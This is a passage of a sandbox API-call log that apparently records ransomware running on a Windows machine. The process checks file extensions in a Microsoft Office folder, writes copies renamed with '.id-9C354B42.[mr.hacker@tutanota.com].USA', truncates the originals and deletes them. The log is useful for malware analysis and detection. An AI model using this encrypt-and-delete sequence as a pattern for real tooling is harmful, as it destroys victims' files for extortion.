lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK") returned 63 [0273.107] lstrlenW (lpString=".doc") returned 4 [0273.107] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0273.107] lstrlenW (lpString=".docx") returned 5 [0273.107] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0273.107] lstrlenW (lpString=".pdf") returned 4 [0273.107] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0273.107] lstrlenW (lpString=".xls") returned 4 [0273.107] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0273.107] lstrlenW (lpString=".xlsx") returned 5 [0273.108] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0273.108] lstrlenW (lpString=".ppt") returned 4 [0273.108] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0273.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK") returned 63 [0273.108] lstrlenW (lpString=".zip") returned 4 [0273.108] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0273.108] lstrlenW (lpString=".rar") returned 4 [0273.108] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0273.108] lstrlenW (lpString=".bz2") returned 4 [0273.108] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0273.108] lstrlenW (lpString=".7z") returned 3 [0273.108] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0273.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK") returned 63 [0273.108] lstrlenW (lpString=".dbf") returned 4 [0273.108] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0273.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK") returned 63 [0273.108] lstrlenW (lpString=".1cd") returned 4 [0273.108] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0273.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK") returned 63 [0273.108] lstrlenW (lpString=".jpg") returned 4 [0273.108] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0273.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK") returned 63 [0273.108] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK") returned 63 [0273.108] lstrlenW (lpString=".doc") returned 4 [0273.108] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0273.108] lstrlenW (lpString=".docx") returned 5 [0273.108] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0273.108] lstrlenW (lpString=".pdf") returned 4 [0273.108] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0273.108] lstrlenW (lpString=".xls") returned 4 [0273.108] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0273.109] lstrlenW (lpString=".xlsx") returned 5 [0273.109] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0273.109] lstrlenW (lpString=".ppt") returned 4 [0273.109] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0273.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK") returned 63 [0273.109] lstrlenW (lpString=".zip") returned 4 [0273.109] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0273.109] lstrlenW (lpString=".rar") returned 4 [0273.109] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0273.109] lstrlenW (lpString=".bz2") returned 4 [0273.109] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0273.109] lstrlenW (lpString=".7z") returned 3 [0273.109] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0273.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK") returned 63 [0273.109] lstrlenW (lpString=".dbf") returned 4 [0273.109] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0273.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK") returned 63 [0273.109] lstrlenW (lpString=".1cd") returned 4 [0273.109] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0273.109] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXCEL_K_COL.HXK") returned 63 [0273.109] lstrlenW (lpString=".jpg") returned 4 [0273.109] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0273.109] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0273.109] lstrlenW (lpString="EXPTOOWS.DLL") returned 12 [0273.109] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXPTOOWS.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\exptoows.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0273.130] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=12160) returned 1 [0273.130] CloseHandle (hObject=0x390) returned 1 [0273.130] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXPTOOWS.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\exptoows.dll")) returned 0x20 [0273.130] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXPTOOWS.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\exptoows.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.130] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXPTOOWS.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\exptoows.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0273.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXPTOOWS.DLL") returned 60 [0273.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXPTOOWS.DLL") returned 60 [0273.131] lstrlenW (lpString=".doc") returned 4 [0273.131] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0273.131] lstrlenW (lpString=".docx") returned 5 [0273.131] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0273.131] lstrlenW (lpString=".pdf") returned 4 [0273.131] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0273.131] lstrlenW (lpString=".xls") returned 4 [0273.131] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0273.131] lstrlenW (lpString=".xlsx") returned 5 [0273.131] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0273.131] lstrlenW (lpString=".ppt") returned 4 [0273.131] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0273.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXPTOOWS.DLL") returned 60 [0273.131] lstrlenW (lpString=".zip") returned 4 [0273.131] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0273.131] lstrlenW (lpString=".rar") returned 4 [0273.131] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0273.131] lstrlenW (lpString=".bz2") returned 4 [0273.131] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0273.131] lstrlenW (lpString=".7z") returned 3 [0273.131] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0273.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXPTOOWS.DLL") returned 60 [0273.131] lstrlenW (lpString=".dbf") returned 4 [0273.131] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0273.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXPTOOWS.DLL") returned 60 [0273.131] lstrlenW (lpString=".1cd") returned 4 [0273.131] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0273.131] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXPTOOWS.DLL") returned 60 [0273.132] lstrlenW (lpString=".jpg") returned 4 [0273.132] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0273.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXPTOOWS.DLL") returned 60 [0273.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXPTOOWS.DLL") returned 60 [0273.132] lstrlenW (lpString=".doc") returned 4 [0273.132] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0273.132] lstrlenW (lpString=".docx") returned 5 [0273.132] lstrcmpiW (lpString1=".docx", lpString2="S.DLL") returned -1 [0273.132] lstrlenW (lpString=".pdf") returned 4 [0273.132] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0273.132] lstrlenW (lpString=".xls") returned 4 [0273.132] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0273.132] lstrlenW (lpString=".xlsx") returned 5 [0273.132] lstrcmpiW (lpString1=".xlsx", lpString2="S.DLL") returned -1 [0273.132] lstrlenW (lpString=".ppt") returned 4 [0273.132] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0273.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXPTOOWS.DLL") returned 60 [0273.132] lstrlenW (lpString=".zip") returned 4 [0273.132] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0273.132] lstrlenW (lpString=".rar") returned 4 [0273.132] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0273.132] lstrlenW (lpString=".bz2") returned 4 [0273.132] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0273.132] lstrlenW (lpString=".7z") returned 3 [0273.132] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0273.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXPTOOWS.DLL") returned 60 [0273.132] lstrlenW (lpString=".dbf") returned 4 [0273.132] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0273.132] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXPTOOWS.DLL") returned 60 [0273.132] lstrlenW (lpString=".1cd") returned 4 [0273.132] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0273.133] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\EXPTOOWS.DLL") returned 60 [0273.133] lstrlenW (lpString=".jpg") returned 4 [0273.133] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0273.133] lstrcmpiW (lpString1=".VRD", lpString2=".USA") returned 1 [0273.133] lstrlenW (lpString="FLOCH.VRD") returned 9 [0273.133] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\floch.vrd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0273.134] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=2028) returned 1 [0273.134] CloseHandle (hObject=0x390) returned 1 [0273.134] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\floch.vrd")) returned 0x20 [0273.134] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\floch.vrd.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.134] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\floch.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0273.134] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.134] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.134] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\floch.vrd.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0273.135] GetLastError () returned 0x0 [0273.135] ReadFile (in: hFile=0x390, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x7ec, lpOverlapped=0x0) returned 1 [0273.136] WriteFile (in: hFile=0x328, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0x7f0, lpOverlapped=0x0) returned 1 [0273.137] ReadFile (in: hFile=0x390, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.137] WriteFile (in: hFile=0x328, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0273.137] SetEndOfFile (hFile=0x328) returned 1 [0273.137] CloseHandle (hObject=0x328) returned 1 [0273.137] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.137] SetEndOfFile (hFile=0x390) returned 1 [0273.138] CloseHandle (hObject=0x390) returned 1 [0273.139] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.139] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\floch.vrd")) returned 1 [0273.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD") returned 57 [0273.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD") returned 57 [0273.139] lstrlenW (lpString=".doc") returned 4 [0273.139] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1 [0273.139] lstrlenW (lpString=".docx") returned 5 [0273.139] lstrcmpiW (lpString1=".docx", lpString2="H.VRD") returned -1 [0273.139] lstrlenW (lpString=".pdf") returned 4 [0273.139] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1 [0273.139] lstrlenW (lpString=".xls") returned 4 [0273.139] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1 [0273.139] lstrlenW (lpString=".xlsx") returned 5 [0273.139] lstrcmpiW (lpString1=".xlsx", lpString2="H.VRD") returned -1 [0273.139] lstrlenW (lpString=".ppt") returned 4 [0273.139] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1 [0273.139] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD") returned 57 [0273.139] lstrlenW (lpString=".zip") returned 4 [0273.139] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1 [0273.140] lstrlenW (lpString=".rar") returned 4 [0273.140] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1 [0273.140] lstrlenW (lpString=".bz2") returned 4 [0273.140] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1 [0273.140] lstrlenW (lpString=".7z") returned 3 [0273.140] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1 [0273.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD") returned 57 [0273.140] lstrlenW (lpString=".dbf") returned 4 [0273.140] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1 [0273.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD") returned 57 [0273.140] lstrlenW (lpString=".1cd") returned 4 [0273.140] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1 [0273.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD") returned 57 [0273.140] lstrlenW (lpString=".jpg") returned 4 [0273.140] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1 [0273.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD") returned 57 [0273.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD") returned 57 [0273.140] lstrlenW (lpString=".doc") returned 4 [0273.140] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1 [0273.140] lstrlenW (lpString=".docx") returned 5 [0273.140] lstrcmpiW (lpString1=".docx", lpString2="H.VRD") returned -1 [0273.140] lstrlenW (lpString=".pdf") returned 4 [0273.140] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1 [0273.140] lstrlenW (lpString=".xls") returned 4 [0273.140] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1 [0273.140] lstrlenW (lpString=".xlsx") returned 5 [0273.140] lstrcmpiW (lpString1=".xlsx", lpString2="H.VRD") returned -1 [0273.140] lstrlenW (lpString=".ppt") returned 4 [0273.140] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1 [0273.140] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD") returned 57 [0273.140] lstrlenW (lpString=".zip") returned 4 [0273.141] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1 [0273.141] lstrlenW (lpString=".rar") returned 4 [0273.141] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1 [0273.141] lstrlenW (lpString=".bz2") returned 4 [0273.141] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1 [0273.141] lstrlenW (lpString=".7z") returned 3 [0273.141] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1 [0273.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD") returned 57 [0273.141] lstrlenW (lpString=".dbf") returned 4 [0273.141] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1 [0273.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD") returned 57 [0273.141] lstrlenW (lpString=".1cd") returned 4 [0273.141] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1 [0273.141] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\FLOCH.VRD") returned 57 [0273.141] lstrlenW (lpString=".jpg") returned 4 [0273.141] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1 [0273.141] lstrcmpiW (lpString1=".VRD", lpString2=".USA") returned 1 [0273.141] lstrlenW (lpString="GANTT.VRD") returned 9 [0273.141] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gantt.vrd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0273.142] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x34bff1c | out: lpFileSize=0x34bff1c*=2043) returned 1 [0273.142] CloseHandle (hObject=0x390) returned 1 [0273.142] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gantt.vrd")) returned 0x20 [0273.142] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gantt.vrd.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0273.142] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gantt.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0273.142] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.143] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.143] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gantt.vrd.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0273.143] GetLastError () returned 0x0 [0273.143] ReadFile (in: hFile=0x390, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x7fb, lpOverlapped=0x0) returned 1 [0273.144] WriteFile (in: hFile=0x328, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0x800, lpOverlapped=0x0) returned 1 [0273.145] ReadFile (in: hFile=0x390, lpBuffer=0x3ce0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x34bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesRead=0x34bfed4*=0x0, lpOverlapped=0x0) returned 1 [0273.145] WriteFile (in: hFile=0x328, lpBuffer=0x3ce0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x34bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ce0020*, lpNumberOfBytesWritten=0x34bfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0273.145] SetEndOfFile (hFile=0x328) returned 1 [0273.145] CloseHandle (hObject=0x328) returned 1 [0273.145] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x34bfec8 | out: lpNewFilePointer=0x0) returned 1 [0273.145] SetEndOfFile (hFile=0x390) returned 1 [0273.147] CloseHandle (hObject=0x390) returned 1 [0273.147] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0273.147] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gantt.vrd")) returned 1 [0273.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD") returned 57 [0273.147] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD") returned 57 [0273.147] lstrlenW (lpString=".doc") returned 4 [0273.147] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1 [0273.147] lstrlenW (lpString=".docx") returned 5 [0273.147] lstrcmpiW (lpString1=".docx", lpString2="T.VRD") returned -1 [0273.147] lstrlenW (lpString=".pdf") returned 4 [0273.147] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1 [0273.147] lstrlenW (lpString=".xls") returned 4 [0273.147] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1 [0273.147] lstrlenW (lpString=".xlsx") returned 5 [0273.147] lstrcmpiW (lpString1=".xlsx", lpString2="T.VRD") returned -1 [0273.148] lstrlenW (lpString=".ppt") returned 4 [0273.148] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1 [0273.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD") returned 57 [0273.148] lstrlenW (lpString=".zip") returned 4 [0273.148] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1 [0273.148] lstrlenW (lpString=".rar") returned 4 [0273.148] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1 [0273.148] lstrlenW (lpString=".bz2") returned 4 [0273.148] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1 [0273.148] lstrlenW (lpString=".7z") returned 3 [0273.148] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1 [0273.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD") returned 57 [0273.148] lstrlenW (lpString=".dbf") returned 4 [0273.148] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1 [0273.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD") returned 57 [0273.148] lstrlenW (lpString=".1cd") returned 4 [0273.148] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1 [0273.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD") returned 57 [0273.148] lstrlenW (lpString=".jpg") returned 4 [0273.148] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1 [0273.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD") returned 57 [0273.148] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD") returned 57 [0273.148] lstrlenW (lpString=".doc") returned 4 [0273.148] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1 [0273.148] lstrlenW (lpString=".docx") returned 5 [0273.148] lstrcmpiW (lpString1=".docx", lpString2="T.VRD") returned -1 [0273.148] lstrlenW (lpString=".pdf") returned 4 [0273.148] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1 [0273.148] lstrlenW (lpString=".xls") returned 4 [0273.148] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1 [0273.148] lstrlenW (lpString=".xlsx") returned 5 [0273.148] lstrcmpiW (lpString1=".xlsx", lpString2="T.VRD") returned -1 [0273.149] lstrlenW (lpString=".ppt") returned 4 [0273.149] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1 [0273.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD") returned 57 [0273.149] lstrlenW (lpString=".zip") returned 4 [0273.149] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1 [0273.149] lstrlenW (lpString=".rar") returned 4 [0273.149] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1 [0273.149] lstrlenW (lpString=".bz2") returned 4 [0273.149] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1 [0273.149] lstrlenW (lpString=".7z") returned 3 [0273.149] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1 [0273.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD") returned 57 [0273.149] lstrlenW (lpString=".dbf") returned 4 [0273.149] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1 [0273.149] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VRD") returned 57 [0273.149] lstrlenW (lpString=".1cd") returned 4 [0273.149] lstrcmpiW (lpString1=".1cd", 